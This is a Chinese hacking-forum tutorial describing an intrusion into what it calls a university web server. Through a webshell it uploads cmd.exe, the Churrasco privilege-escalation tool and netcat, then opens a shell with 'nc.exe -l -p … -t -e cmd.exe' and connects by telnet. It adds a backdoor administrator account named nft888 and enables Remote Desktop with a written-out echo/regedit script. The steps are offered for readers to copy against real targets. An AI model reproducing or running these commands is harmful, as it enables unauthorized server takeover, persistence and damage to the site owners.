NC反弹拿服务

作者； 萝卜头

博客地址 www.luobot.tk

好久也没出教程了 主要是我现在忙着管理我的群 人数越来越多有点乱 他们又让我忙着给他们做视频 ！！所以也很少在暗组发视频了 一般都发到我的博客上了 ！！

发话少说 进主题！入侵的是个大学到 网站 这里我就涂鸦了 ！！上一次我发了个入侵php的网站没打好马赛克 叫一些手贱的人加以利用攻击目标主站 但是那个站就废了 ！！！在这时我是叫你们技术不是叫你们破坏啊这么喜欢挂黑夜啊 迟早惹出事来 ！！迟早到局子！！！

看看web支持的组件 ！！

同时看下c盘program



1 小时前 上传
下载附件 (111.19 KB)



半小时前 上传
下载附件 (95.12 KB)

Wscript.Shell 支持 不错 这样就容易多了 ！！其实不支持我在邪八看到一篇

关于《没有Wscript.shell组件提权我们该怎么办呢 》！！文章不错 有空可以

来看看 我已经保存到我的博客里了 http://hi.baidu.com/hc%C3%F7%C3%

F78888/blog/item/bc1ff60f3fd30eda3ac76348.html

下一步看磁盘信息 找到能写的磁盘！！

不是没权限看就是不可写 ！！晕 其实 C盘回收站一般权限很大 的确可读可

写！！



1 小时前 上传
下载附件 (123.57 KB)



1 小时前 上传
下载附件 (64.13 KB)

好我们 上传我们的提取工具cmd.exe Churrasco.exe nc.exe 遇到点小麻烦 不能直接上传 我们的工具(提示 缺少对象 Microsoft VBScript 运行时错误(点此返回上页) 没权限需要远程下载！！



1 小时前 上传
下载附件 (30.65 KB)

好本地搭建上传！！！



1 小时前 上传
下载附件 (77.09 KB)

一次好上传完成！！！



1 小时前 上传
下载附件 (61.9 KB)

下面就来 执行我们的命令 ！！

来到 →> CMD---命令

net user看一下用户 ！！



1 小时前 上传
下载附件 (47.64 KB)

这种情况下是不能直接添加用户的



半小时前 上传
下载附件 (43.02 KB)

开始我们nc反弹！！！

nc格式命令



1 小时前 上传
下载附件 (66.99 KB)

路径\nc.exe -l -p 端品 -t -e 路径\cmd.exe

这里我反弹的端口是446 （这个端口可以随便改 啊)

看我操作吧 ！！

把命令放上执行 出现假死现象 我们在本机打开自己的cmd!!

用到telnet命令！！

本机TELNET命令

telnet 服务器IP 端口

先ping一下对方的ip

在cmd下输入 telnet 对方ip 446

好转到目标主机window\system32\下



1 小时前 上传
下载附件 (23.01 KB)

这种情况下页无法添加用户！！

需要借助巴西帮助下 ！！



半小时前 上传
下载附件 (23.8 KB)

看不行吧

好添加nft888的用户



半小时前 上传
下载附件 (76.82 KB)

好添加用户成功！！下一步 提升权限



半小时前 上传
下载附件 (79.78 KB)

好成功！！

看一下用户！！



7 分钟前 上传
下载附件 (44.93 KB)

好成功！！

我们去连接一下主机 晕@@@没开3389 ！！！

没开自己去开啊！！也难不住我们！！

开3389

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

regedit /s 3389.reg

del 3389.reg

好我们运行我们的命令 成功！！！



1 分钟前 上传
下载附件 (21.99 KB)

去连接主机 ！！



26 分钟前 上传
下载附件 (8.97 KB)



26 分钟前 上传
下载附件 (43.36 KB)